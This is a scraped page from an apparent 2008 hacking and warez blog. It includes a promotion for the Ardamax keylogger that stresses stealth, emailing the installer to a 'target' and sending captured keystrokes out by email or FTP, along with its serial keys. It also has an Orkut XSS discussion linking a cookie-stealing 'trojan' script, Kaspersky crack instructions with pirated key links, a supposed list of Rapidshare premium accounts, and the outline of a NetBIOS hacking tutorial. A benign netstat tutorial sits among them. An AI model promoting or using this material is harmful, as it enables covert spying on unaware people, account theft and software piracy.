Flipkart Deals

Hacker"s Search Box

Google

Tuesday, October 14, 2008

Ardamax Keylogger - Ultra cool keylogger

Ardamax Keylogger is a keystroke recorder for monitoring EVERYTHING people type on the computer. In total stealth, the program records keystrokes made in all applications – Microsoft Word, Outlook Express, Skype, Internet Explorer and anywhere else, makes snapshots of the screen and saves captured information to an encrypted log file. The log file has a time stamp and the name of the application where the keystrokes have been captured. You can view the log in the built-in Log Viewer, or have it sent to you by email, via LAN, or get it uploaded to the FTP server.

The program leaves no traces of its presence and cannot be discovered by the computer system. Other users do not suspect they are being monitored and cannot see the program in Windows processes, even with advanced process viewers. The program can be accessed by the user who knows a valid access password.

Ardamax Keylogger runs on Windows 2000, XP, 2003, Vista.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security - allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Homepage:
http://www.ardamax.com/keylogger/

Download:
http://www.ardamax.com/downloads/setup_akl.exe

Registration for full version:

[1] Ardamax Keylogger 3

GHIJ2H4 837Y43DS83

[2] Ardamax Keylogger 3.0

Name: AlmeloseAndy Serial: KDSHWAUIWHA1OSA

[3] Ardamax Keylogger 3.0

Registration name: Kimberley Ronald
Registration code: RGA3Y3A-M3D88-T3HU5-T28TM-G47AS-SFTD7-624JC

Stop Piracy ! - Please pay to buy full product, the blog owner is not responsible for the above info.

Provide backlink if you publish this blog's information on web.

Sunday, June 1, 2008

HD Videos in Youtube !

This video will teach you how to use youtube's new feature for watching High/Higher Definition videos in yourube....amazing hm..
Sit back and Enjoy~~

Friday, May 23, 2008

Orkut Social Application - An Alert Script trouble !

As been described here

" When one of my friends told this, I didn t take it very seriously. Because, what he told was not happening for me. What he told was  Hey G, whenever I come to your profile, a alert box appears with the name askoppal. Do you know who it is

Well, askoppal is my friend and is in my friends list, but nothing of that sort happened, because I was using opera then and scripts were blocked. But the interesting happened today morning when I used firefox, yes a alert box was indeed appearing when I visited my profile.

Primary Investigations showed me that there wasn t anything in the source that could be causing this. Then I went to askoppal s profile page and found that his profile name was
alert( askoppal )

and hence an alert box was appearing even in his profile page. But why in mine?

So what I did was I changed my title to a similar one.
alert( Jithin K.Rajeev )
And then I observed that even my name too was displayed in the alert box, but two times it appeared and then askoppal s name.

Now the question was, is there any possibility of compromising your account using this bug. If yes, has anyone already started exploiting this bug? I posted my thoughts at Hacker s Library. And Vipul responded back in my scrapbook. (I don t think I can recreate the conversation here as he keeps his scrap book empty.L.) Anyway let me see.

These are Vipul s perspective about how this bug can be exploited.

You can successfully make an XSS attack using the TypeRacer app s bug.

How about a link to an external script.
Actually name field has limited letters, so you can simply so is we can connect it via external scripts. But still, it s not good to have such a flaw!

The basic of XSS is if you re able to execute scripts on a remote machine using a bug from a live site.
We can just publish that malicious scripts can be executed in orkut can cause a  Man in Middle attack.

How are we able to execute script?
In what ways, one way is by typing in the First Name - Last name fields.

It s just working with profile name, nothing else.
Actually the profile name flashes in the TypeRacer app, that s why!

Then I tried using document.cookie in the script (javascript:alert( document.cookie ) when executed in your address bar displays the cookies set.) But the outcome was a blank alert box. This means that document.cookie did not carry any value. It was null, when executed via TypeRacer app.

To this Vipul replied

How about the spammers?
They can make fake accounts and add themselves in typeracer and then they put the redirection script to advertisement sites and can gain profits. A script hosted on a different server which contains the bunch of those click fraud URLs.

Then after some profile surfing, I found that it was irritating at times to have a bunch of alerts, in profile having TypeRacer app. It seems that JavaApplet can be executed via similar scripting. In a community discussion, I found the code which claimed to be  a orkut trojan

http://f4.filecrunch.com/files/20080512/cd347c7536557e269ff599fb5756fd9a/hi3.js

What this code does shall be discussed later. It basically mails your cookies and transfers your communities. But using latest firefox and ie7 avoids session and cookie hijacks and for transferring communities, the password is now required. So there isn t any possibility of account and community hijack. Only some irritating scripts might run. Well, use firefox with NoScript addon installed, to avoid all problems.

Best Solution : Remove TypeRacer App at least till the problem is resolved by the brains behind the application. And do use Firefox with NoScript addon."

Thursday, May 22, 2008

50+ Google Reader Productivity Hacks

Google Reader is already a tool that can be used to boost your productivity throughout the day by letting you view your favorite blog’s feeds and posts in one spot: through your Google account. But for those of us who tend to get bogged down in a lot of useless subscriptions and really need to cut down on the minutes (or hours) we spend procrastinating each day, there are a lot of little hacks to make Google Reader more productive. We’ve compiled a list of over 50 of our favorites here.

Keyboard Shortcuts

Use these basic but necessary keyboard shortcuts to make searching, organizing, sharing and reading your feeds more efficient.

  1. /: Use the forward slash to move your cursor to the search box and start looking for new stuff or saved items.
  2. g then u: Type g then u to go to your subscriptions.
  3. g then d: This shortcut will take you to the recommended page. If there are no recommendations, typing g then d will take you to the browse page.
  4. 2: Press 2 to see your subscriptions in a list view or headline view.
  5. ?: Find more keyboard shortcuts just for Google Reader by pressing the question mark.
  6. Shift-s: Pressing Shift-S will share or un-share the selected item.
  7. s: Star and un-star your highlighted items simply by pressing s.
  8. Shift-o: Open up the highlighted subscription or folder with this shortcut.
  9. g then h: Press g then h to go back to the Google Reader homepage.
  10. g then shift-s: This shortcut will take you to the “Your Shared Items” page.
  11. shift-n/p: n/p stands for Next/Previous, and using this combination will select the Next/Previous selection or folder.
  12. v: Open up the original page of the selected item in Google Reader.
  13. e: Quickly e-mail a page or other selection by pressing e when you’re in Google Reader.
  14. r: Check to see if anymore unread updates have been added when you hit the r button in the navigation.

For Firefox

Firefox users like their browser’s speed and ability to add on new scripts or buttons. Check out several Google Reader-specific hacks for Firefox here.

  1. Enhance Google Reader Preview: This script adds a Preview button so that you don’t have to open up an article or post all the way to read it.
  2. BlogThis2Me: The BlogThis2Me script lets you “blog Google Reader’s “BlogThis!” to your own blog system, not to blogger.com,” as long as you have Firefox and Greasemonkey.
  3. Smart Google Reader Subscribe Button: this script “adds an overlayed check icon when you’re subscribed to at least one of the feeds that the site advertises via auto-discovery.”
  4. Gbutts 1.5.1: Gbutts is short for Google buttons, and you can add your Google Reader button, as well as any other Google buttons, to your Firefox address bar.
  5. Better GReader: Better GReader works with Firefox adds a menu with extra options and features like Smart Subscribe, Preview Inline, Optimized Skin and others.
  6. Google Reader Watcher: Google Reader Watcher is an add-on that makes Firefox check your Google Reader for unread fees. This download does not require Greasemonkey.
  7. Quick Hide Message: Shave off milliseconds with this script, which “quickly hides the message displayed in Google Reader after performing renames, folder changes,” and other actions.
  8. Auto Add Feed: The Auto Add Feed script only adds feeds to Google Reader, instead of asking you where you want it to be saved.
  9. Title Unread Count: This hack moves the unread count in Google Reader to the front.
  10. Greasereader: Add even more hot keys to your Google Reader systems by reading this guide.
  11. Google Reader All Starred: Extract all of your starred items as links from Google Reader so that you don’t have to download each one.
  12. Google Reader Read by Mouse: Set up this script so that you can use a mouse-only system to read your feeds. It uses mouse buttons for the following actions: next item, previous item, and more.

Real Time Savers

If you’re serious about making your Google Reader visits more efficient, learn how to categorize by priority, use the “next” bookmarklet, and implement scripts that let you autoscroll, review your subscriptions and more.

  1. Categorize by priority: Stepcase Lifehack recommends categorizing your feeds by priority so that you don’t get bogged down in irrelevant articles.
  2. Google Reader Autoscroll: The autoscroll script lets you “view and mark items as read by means of a mouse wheel and keyboard shortcuts.”
  3. Mark All as Read: If you only want to read one article from a feed, you can mark everything else as read to weed out your extra entries.
  4. Google Reader Scroll Reducer: With this script, you’re able to comment on and view the original site without having to scroll to the top of page to get to the URL.
  5. The “Next” Bookmarklet: The Google Reader Blog discusses this hack, which “allows you to use Google Reader through just one link — clicking on it takes your browser to the next unread item in your reading list.”
  6. Review your subscriptions: Are you still getting subscriptions for some obscure hobby you were only interested in a year ago? Go through your subscriptions and delete any that you don’t really want emptied into your account regularly.
  7. Print Button v2.0: The Google Reader Print Button v2.0 allows users to print either the selected content or everything that’s displayed on the page in Google Reader.
  8. Gmail + Google Reader: Add Google Reader into your Gmail account so you don’t have to constantly switch back and forth.
  9. Google Reader Filter: Get rid of duplicate and unwanted content with this script.
  10. Tag your items: Take advantage of the tagging feature on Google Reader. It’s there to help you stay organized and more productive.

Social Media Hacks

How much time do you waste each day checking all of your social media accounts? These hacks let you sync up Google Reader with Facebook, Twitter, Tumblr, Google Chat and more.

  1. Google Reader + ma.gnolia: This basic script lets you add a Google Reader post to ma.gnolia.
  2. Google Reader Digg News: Add a Digg button to your Google Reader posts with this script.
  3. Tumblr: Sync up your Google Reader and Tumblr with this script. You can attach your reblog button or Share-on-Tumblr at the bottom of articles on Google Reader.
  4. Managing Your Shared Items: This post from the Google Reader Blog shows you how to add and remove friends from your Gmail or GChat account.
  5. Google Reader and Flickr: Now you embed Flickr videos into your Google Reader, so you don’t have to switch back and forth to share with extra friends or read their comments.
  6. Facebook Sharer + Google Reader: Share your favorite posts and articles with Google Reader friends and Facebook friends.
  7. Google Reader + del.icio.us: Use this script to define tags and links for a faster way of posting to del.icio.us.
  8. Google Reader + Twitter: Use this script to add reader posts to Twitter.

Add-Ons and Solutions

Try out these add-ons to customize your Google Reader experience and streamline your Google accounts.

  1. Google Reader Notifier: This extension keeps you updated by showing you how many unread items you have in your account.
  2. Add a Search: Add a search engine to your Google Reader account to make searching for items faster.
  3. Google Reader Optimized: Use this script to view Google Reader in a larger space. The last official update was in 2006, but Google Reader users have submitted updates.
  4. Google Reader Romeo Script: Check out this script to access Google Reader from your cell phone — if you don’t have an iPhone.
  5. Google Reader Button for Internet Explorer: IE users can add on a Google Reader to their browser using this tutorial.
  6. iPhone Skin: iPhone users can easily view Google Reader on their phones with this special skin from developer David Cann.
  7. Iris: View your Google Reader subscriptions in a Firefox sidebar.
  8. Go behind the scenes: If you want to know how many people have subscribed to a certain feed, you can use this tutorial to speed up your search times.
Thank You !

Monday, May 19, 2008

ALL ABOUT NETSTAT - A TUTORIAL

Note- This tutorial may bear a resemblance to tutorials written by other authors. I have acknowledged to tutorials or articles that I referred before writing this tutorial. It is possible that there may be other tutorials I have not referred and are similar to my tutorial. It is not possible for me to give acknowledgment to such tutorials and hence there must be no copyright or legal issues regarding this tutorial.

Dear reader

In this tutorial I am going teach how to use a very useful command netstat. By using netstat you will be able to find out the ip address of your computer and of the remote computer connected to your computer and most importantly you will be able to know what ports are open on our computer - this will help you know if your computer is infected by a Trojan. Let us see how to launch netstat command. netstat is a MS-DOS based command, you can not use mouse to interact with this utility. To launch this command simply run MS-DOS prompt. To do this just click on 'Run...' after clicking on Start button and then type command and press enter key. Alternatively you can select MS-DOS prompt from Start menu if you are using windows 98 or from accessories if you are using windows NT,2000 or XP. After launching command prompt you will get

C:\windows>

or

C:\>

To launch netstat type netstat -a and press enter key.

C:\windows>netstat -a

This will give output similar to this.

Active Connections

Proto Local Address Foreign Address State

TCP gaurav:1753 www.ethicalhackers.tk:http ESTABLISHED

TCP gaurav:1081 ftp.mycgiserver.com:ftp ESTABLISHED

TCP gaurav:1036 ftp.mycgiserver.com:ftp-data TIME_WAIT

TCP gaurav:1145 mail.sec33.com:pop3 ESTABLISHED

Let us try to understand this output in some detail.

Proto Its full name is Protocol. A protocol is simply a set of rules that your computer follows to communicate to other computers.

The TCP shown under the heading Proto shows that our computer is using the TCP (Transfer Control Protocol ) to communicate to the other computer. An other type of protocol is UDP

Local Address This is the address of our computer. Under this heading we can see gauarv:1081. gaurav is the name of our computer. This is the name asked by windows setup during installation.1081 is our local port number and is randomly generated. A port is simply a virtual 'road' on which internet data 'travels'

Foreign Address This is very important for us. Under this heading we can see ftp.mycgiserver.com This shows that our computer is connected to computer having name ftp.mycgiserver.com

State This tells about the state of our connection. Following table will help you in understanding these.

STATE WHAT DOES IT MEAN
CLOSED There is no connection between your computer and remote host.
CLOSING Your computer and remote computer have both agreed to close connection.
CLOSE WAIT The remote computer has initiated to close the connection
ESTABLISHED There is a connection.
FIN WAIT 1 The software using connection (like msn messenger) has finished using the connection
FIN WAIT 2 The remote computer has agreed to close connection.
LAST ACK The connection is waiting for all the data packets to destroy.
LISTEN Your computer is listening for incoming connection
SYN RCVD Remote computer is sending a request for connection
SYN SENT Your computer has initiated to open a connection
TIMED WAIT same as LAST ACK

Now let us see some other options available with the netstat command. If you want to know the options available you can pass /? as an argument to the netstat command i.e.


c:\windows>netstat /?

We will get the following output.

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports. (Server-side connections are normally not shown).

-e Displays Ethernet statistics. This may be combined with the -s option.

-n Displays addresses and port numbers in numerical form.

-p proto Shows connections for the protocol specified by proto; proto may be tcp or udp. If used with the

-s option to display per-protocol statistics, proto may be tcp, udp, or ip.

-r Displays the contents of the routing table.

-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p

option may be used to specify a subset of the default.

interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to

stop redisplaying statistics. If omitted, netstat will print the current configuration information

once.


Before we explore all the options let us apply the knowledge we have just gathered. Let suppose we want to find out if our computer is infected with a Trojan. For those who don't know about Trojans I would like to tell them that Trojans malicious programs that may have come in form of a email attachment or in the form of infected software. These Trojans generally listen on some port for connections and after accepting the connection the remote computer user may execute any command on your computer. The most popular trojan is Back Orifice

So if you want to check out whether your computer is infected with Back Orifice you will run command netstat -a and if it shows that your computer is listening on port 31337 you must download some Trojan removal software. Please note that these Trojans have options that allow the remote attacker allow to change default port for accepting connections. For example a remote attacker may have changed the default port from 31337 to 54871. So you must look for suspicious ports. Click here to get a list of such Trojans and the default ports on which they accept connections.

Now let us explore all the options available with the netstat command. We have already used -a option that shows all the connections and listening ports. Let use explore -n option.

The netstat -n command will display the numbers in place of the names i.e. instead of name of our computer we will get the ip address of our computer. This option is helpful if we want to know the ip address of our computer and of the remote computer connected to our computer.

The netstat -p command is used to get information related to a particular protocol. Suppose we want to know only about the connections using UDP we will use command netstat -p udp and netstat -p tcp for connections using tcp. Please note that we can combine options. For example the command netstat -a -p udp and this will give us information about all the connections using UDP.

The netstat -s and netstat -e command are used to display detailed statistics about the different protocols. These commands are generally to correcting network problems.

The netstat -r is used to display routing tables. We need not go in details but I would like to tell you that routing table is used by computers to figure out by which route they should pass on the data. If a computer can not find out a suitable route it will discard the data packet.

Now before I end this tutorial let us see the use of interval option. If you specify a number in place of interval the netstat command will run again and again after that period of seconds. e.g. netstat -a 1 To exit from the command you will have to press CTRL+C.

NETBIOS BASED HACKING TUTORIAL - For Edu. purpose only ~

Note- This tutorial may bear a resemblance to tutorials written by other authors. I have acknowledged to tutorials or articles that I referred before writing this tutorial. It is possible that there may be other tutorials I have not referred and are similar to my tutorial. It is not possible for me to give acknowledgment to such tutorials and hence there must be no copyright or legal issues regarding thistutorial.

Preface

Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking.

Contents-

A brief lesson on NetBIOS

The NBTSTAT command

What you need to hack ?

Types of attacks

Searching for a victim

Lets Hack - Part 1 Remotely reading/writing to a victim's computer

Cracking "Share "passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim's computer

Lets Hack - Part 2 Denial of service attack

How to protect yourself

Thanks You and our readers.


Thursday, April 17, 2008

Rapidshare.com - Auto Downloader - New Working 100%

Rapidshare since changed their Captcha Images so the program above became unuseable. Though, some very nice members of a german communitiy made it possible again:

- Enter any Link from rapidshare.com oder .de and many other hosters
- Get a full automatic download from rapidshare (it recognises every code by itself)
- Automatically get a new IP after a Rapidshare Download is finished (can be turned off)
--> Everything fully automatic, no need to stay at PC the whole Time

With the pack, I created a small readme.pdf . Please go through all the steps one by one. It uses ABBY Finereader to recognise the code.

Here's a list of all supported Routers: routercontrol.de (url)
For all modem users, there is a good way for you to get a new IP, the way is included in readme.pdf

There are a few background information in the first thread. I can give help for Routercontrol, USDownloader and ABBYY but I don't have a modem, I will do what I can to help you.

Download: http://rapidshare.com/files/108271983/USDpack.rar
Size: 5821 KB

Wednesday, April 2, 2008

Quick Heal Total Security 2008 + Activated = Full + Free (Crack)

Quick Heal Total Security 2008

Quick Heal Total Security 2008

Quick Heal Total Security 2008 gives you complete protection from viruses, spywares, and hackers. It also helps you stay connected and communicate over the internet by preventing your system from threats over the Internet. With Quick Heal Total Security in your PC - Enjoy your freedom to work and play in the connected world.

With Quick Heal Total Security 2008 in your PC, you can scan and clean mobile phone connected via Bluetooth or USB cable.

System Requirements : Platforms

Windows 95 and Windows ME/Windows NT 4.0 Workstation and Server/Windows 2000 Professional

Windows 2000 Server and Windows 2000 Advanced Server/Windows XP Home and Windows XP Professional/Windows 2003 Standard Server

Windows 2003 Enterprise Server

Windows 2003 Web Server.

Download Quick Heal

** Contents of this post is not created by this blog owner but it is in fact found on net and we are just pointing towards it. We do not take any responsibility for any type violations.

Tuesday, March 18, 2008

Kaspersky Anti-Virus 7.0 + Crack =Free (Hacked-100% Working)


Comprehensive anti-virus protection


Email protection. Your email is secure no matter which email program you use because Kaspersky Anti-Virus 7.0 scans email traffic in real-time: POP3, IMAP and NNTP for outgoing mail and SMTP for incoming mail. Moreover, Kaspersky Anti-Virus comes with plug-ins and disinfection routines for email databases for popular email programs such as Microsoft Outlook and Microsoft Outlook Express.

Real-time Internet traffic scanning. Kaspersky Anti-Virus 7.0 scans all HTTP Internet traffic in real-time no matter which browser you use. Malicious programs are detected before they are able to infect your computer. You can use the Internet for business or pleasure and still be secure.

On-access and on-demand file scanning. You can scan any and all areas on your computer from individual files to drives to removable storage media. You can also chose to scan only critical areas such as start up objects, which are a favorite target for virus writers.

Security for your data


Prevents criminals from harvesting your data. Many of today’s Trojans and keyloggers are designed to send your data to third parties without your knowledge or consent. Kaspersky Anti-Virus 7.0 detects and destroys such programs, making sure that your data stays where it belongs until you decide to share it.

Rollback of malicious changes. Kaspersky Anti-Virus 7.0 monitors system and application behavior for suspicious behavior. Once malicious behavior is detected, the process is blocked and all of the changes are rolled back, leaving you with a clean system and your original data intact.

Stability and critical protection


Rescue disk. Creating a rescue disk is quick and easy using the built in wizard in Kaspersky Anti-Virus. If your computer is ever attacked by a virus, you can restore and disinfect your system right away by yourself using the rescue disk you created even if the operating system has been damaged.

Self-protection. Today virus writers begin their attack on your computer by disabling anti-virus protection. Kaspersky Anti-Virus is designed to block all attempts to disable protection, leaving you to work and play securely.

Simple and Convenient


Quick installation and configuration. Express installation takes only a few minutes of your time. The default settings have been configured to provide best performance and best security, so you only need to install the program and can immediately return to your usual activities. If you enjoy customizing your security, the solution has extensive and flexible configuration options that will allow you to adjust the settings exactly as you like.

Minimal load on your system. A range of technologies ensures that you get the best out from your computer and stay secure: only new and changed files are scanned in real-time; scanning is paused if your other activities require additional resources; default settings for real-time monitoring ensure maximum performance.

Automatic hourly updates. Kaspersky Anti-Virus checks for updates on Kaspersky Lab servers regularly. In case of virus outbreaks the checks are more frequent. All updates are downloaded and installed automatically. You don’t need to worry about a thing.

Download Kaspersky Anti-Virus
Download Path(Crack)

Instructions to use Crack:


1. Install The Application KAV
2. Let Ur Pc Reboot 3. Then Disable Self Defence ( settings tab > services > uncheck the self defence check box)
4. Run The Patch ("Patch Name")
5. when The Patch Opens First Click "Key Remover"
6. then click "patch" KAV
7. Then Click "Clean"
8. Then Click "Key Kav + KIS 7" and extract dat in a folder (suppose d:/kiskey )
9. Then open KIS Or KAV and Click "Activation Tab" Then Click "enter key or watever"
10.Then Click "Already have license key " Then next ...
11.Then Browse To the place where u saved the keyd (d:/kiskey)
12.select the key and then enable self defence ...
13 enjoy the full version .. unlimited ..

**** Some new working keys- we are not responsible for it ; we are just pointing you towards it:

Kaspersky KAS and KIS KEYS till 2009 & 2010
1) Go to ACTIVATION in the Kaspersky window.

2) Click DELETE KEY. (Only if a key has been previously installed)

3) Click INSTALL KEY.

4) After this, Apply existing license key.

5) Select the key which you want to install.

6) Enjoy !!


Tested and working 100%

CODE
http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar
http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar
http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar
http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar
http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar
http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar

Kaspersky Internet Security 7.0 + Crack = Free(Hacked-Working 100%)

Kaspersky Internet Security


Using the Internet safely and securely


Secure surfing. The solution analyses web pages and blocks potentially malicious web-based content. It also blocks pop ups and ads, which are not simply irritating: virus writers often use ads to install Trojans that steal your confidential data or give the Trojan’s owner access to your computer.

Privacy Control. Many malicious programs attempt to locate and harvest user IDs and passwords for online bank accounts, auctions, shops, email, payment systems, chat rooms, online games and etc from Windows Protected Storage. Kaspersky Internet Security monitors and blocks all attempts to collect and forward your confidential data from this storage area.

Protection from phishing. Kaspersky Internet Security filters out phishing emails and protects you from accessing websites run by phishers who use social engineering to fool you into sharing your banking or online payment information.

Parental Control. Parents can protect their children from online predators by creating blacklists of individual websites, as well as identifying categories of forbidden content such as drugs, pornography and so on. These lists can be customized by user type for children, teens or adults. In addition, parents can manage their children’s Internet experience by limiting the amount of time they spend online.

Anti-virus protection and more


Protection from all of today’s Internet threats. Kaspersky Lab combines three protection technologies to protect you against viruses, Trojans, worms, keyloggers, rootkits and other threats. This means that you are safe from spyware, adware, pornware, crimeware and anything else today’s cyber criminals invent.

Firewall. The inbuilt personal firewall provides new generation protection from intrusions and data leaks. The default settings for popular applications control network and Internet activity using the IDS/IPS to prevent hackers from taking over your computer or stealing your data. Stealth mode allows you to surf safely and invisibly, protecting you from becoming a target for hacker attacks.

Anti-spam protection. The anti-spam module uses a combination of filtration methods to protect you from spam targeting you personally: white and black lists of senders and content, self-modifying algorithms for text analysis, graphical spam analysis and more.

Self-protection. Today virus writers begin their attack on your computer by disabling anti-virus protection. Kaspersky Internet Security is designed to block all attempts to disable protection, leaving you to work and play securely.

Restoring your data and your system


Rollback of malicious changes. Kaspersky Internet Security monitors system and application behavior for suspicious behavior. Once malicious behavior is detected, the process is blocked and any changes caused by malicious code are rolled back. Your system is clean and your original data is intact.

Rescue disk. Creating a rescue disk is quick and easy using the built in wizard in Kaspersky Internet Security. If your computer is ever attacked by a virus, you can restore and disinfect your system right away by yourself using the rescue disk you created even if the operating system has been damaged.

Download Kaspersky Internet Security
Download Path(Crack)

Instructions to use Crack:


1. Install The Application KIS
2. Let Ur Pc Reboot 3. Then Disable Self Defence ( settings tab > services > uncheck the self defence check box)
4. Run The Patch ("Patch Name")
5. when The Patch Opens First Click "Key Remover"
6. then click "patch" KIS
7. Then Click "Clean"
8. Then Click "Key Kav + KIS 7" and extract dat in a folder (suppose d:/kiskey )
9. Then open KIS Or KAV and Click "Activation Tab" Then Click "enter key or watever"
10.Then Click "Already have license key " Then next ...
11.Then Browse To the place where u saved the keyd (d:/kiskey)
12.select the key and then enable self defence ...
13 enjoy the full version .. unlimited ..

**** Some new working keys- we are not responsible for it ; we are just pointing you towards it:

Kaspersky KAS and KIS KEYS till 2009 & 2010
1) Go to ACTIVATION in the Kaspersky window.

2) Click DELETE KEY. (Only if a key has been previously installed)

3) Click INSTALL KEY.

4) After this, Apply existing license key.

5) Select the key which you want to install.

6) Enjoy !!


Tested and working 100%

CODE
http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar
http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar
http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar
http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar
http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar
http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar

Friday, March 7, 2008

Download The Entire WebSite !!!!!


Download Entire Website With PageNest

Create a permanent copy of your favorite Web sites. PageNest Free Edition offline browser is a fast, easy to use application which will copy virtually any Web site to your hard disk. You can copy either a single page or an entire site. Copy sites and pages before they disappear from the Internet. Copy sites so you can browse them offline, for example, on a laptop, or without having to dial up the Internet.

To download Click HERE

Sunday, February 3, 2008

Search Engine Optimization | Increse Website Traffic | Attract more Visitors to your Site

I have tried to convey every fact regarding Search Engine Optimiztaion for any Website and all the methods on how to get more visitors to your website.The following Ebook is categorised in the following way and every part briefly described.

About This Book
Foolish Assumptions
How This Book Is Organized
Part I: Search Engine Basics
Part II: Building Search-Engine-Friendly Sites
Part III: Adding Your Site to the Indexes and Directories
Part IV: After You’ve Submitted
Part V: The Part of Tens
Part VI: Appendix
Icons Used in This Book


Download

* This ebook is founded on interent and we are not responsible for any © policy.

Related Resource:

Free online advertising

Saturday, January 19, 2008

Learn in Pictures !




Learn In Picture ... eBook Series ... All-In-One 72Mb
Application includes:

MS Office 2003:
01- Learn Word 2003 In Pictures
02- Learn Excel 2003 In Pictures
03- Learn PowerPoint 2003 In Pictures
04- Learn Access 2003 In Pictures
05- Learn Publisher 2003 In Pictures

Computer Basics:
06- Learn WindowsXP In Pictures

Web Layout:
07- Learn FrontPage 2003 In Pictures
08- Learn Dreamweaver 8 In Pictures
09- Learn HTML & CSS In Pictures

Web Graphics:
10- Learn Photoshop CS2 In Pictures
11- Learn Photoshop Elements 4.0 In Pictures
12- Learn Fireworks 8 In Pictures

Web Programming:
13- Learn PHP Basics In Pictures
14- Learn MySQL Basics In Pictures
15- Learn PERL Basics In Pictures



From RS.com


full+free

*We are not responsible for any violations regarding this post as it does not belongs to us and is been found on net from fullnfree.blogspot.com

Tuesday, January 15, 2008

Getting Geographical Information using an IP Address

"Getting the Internet Protocol or the IP Address of a remote system is said to the most important step in hacking of a system. Sometimes, however we get an IP in order to get more information on someone or some host. But, how can an IP Address be used to get more information on the location etc of a system? Well, this manual is aimed at answering just this question.

Actually, the IP address (Actually the entire TCP/IP Protocol) is structured or designed such that one cannot tell as to in which country a system having the given IP is situated, by simply looking at it. An IP Address has no fields, which tell you the country in which the computer using it resides in. So, all myths like ‘The Second or the third field of an IP stands for the country in which the system using it resides’ are definitely false and untrue."
- Ankit Fadia

To read the whole tutorial click HERE.
Size:58 KB FileType: .doc
*We have just found that file on net and we do not take any responsibility for any © violations.

Redfield Fractalius v1.03 for Adobe Photoshop

Redfield Fractalius v1.03 for Adobe Photoshop



Redfield Fractalius v1.03 for Adobe Photoshop | 308KB
Fractalius plugin creates unusual, eccentric artworks in a single step. The effects are based on extraction of so-called hidden fractal texture of an image. You can also simulate various types of exotic lightings and high realistic pencil sketches.



From RS.com


full+free

*We are not responsible for any violations regarding this post as it does not belongs to us and is been found on net from fullnfree.blogspot.com

Sunday, January 13, 2008

Free Rapidshare Premium Accounts

So ultimately we are providing you the Ultimate List Of Rapidshare's Premium Accounts.
This list was found on an user's Rapidshare folder directory and we do not take any credit for that nor we are responsible for any ill you end up with. The provided list may or may not work as we have not collected it, it may be possible that none of them works or it may be possible that many works for you.
So you will have to check them and have to be lucky to get a working one.
Get it HERE

Keywords:Rapidshare Hacking, Rapidshare Premium Accounts List,

*We are not responsible for any company's © policy violations.Please forgive us!

Norton 360 All-in-One Security


Norton 360 All-in-One Security | 232MB
Norton 360 provides all-in-one protection that keeps you, your family, your PC, and your information secure. This comprehensive solution combines Symantec’s proven, industry-leading security and PC tune-up technologies with new automated backup and antiphishing features, providing a full circle of protection.
Norton 360 is a comprehensive consumer security solution that offers a full circle of protection and eliminates the need to purchase and manage multiple products.- Defends your PC against a broad range of threats.
- Safeguards against online identity theft.
- Protects important files from loss.
- Keeps your PC tuned up for peak performance.
- Provides a hassle-free user experience.
- Protects against the latest online threats.

Top Features:
- Removes viruses from email and instant messages.
- Blocks Internet worms at point of entry.
- Stops spyware from tracking you online.
- Authenticates popular shopping and banking Web sites.
- Protects you from phishing sites designed to steal your confidential information.
- Discovers new files and backs up that data automatically.
- Automatically back up important files to a secure online service.
- Local backup to CD, DVD or external drive.
- Automatically removes unwanted Internet clutter and temporary files


From RS.com


full+free


*We are not responsible for any violations regarding this post as it does not belongs to us and is been found on net from fullnfree.blogspot.com

Wednesday, January 9, 2008

Introduction to TELNET

Learning Telnet
*::Don't use this for illegal stuff::

Introduction:
Telnet is used to connect to remote machines through emulation. This means that
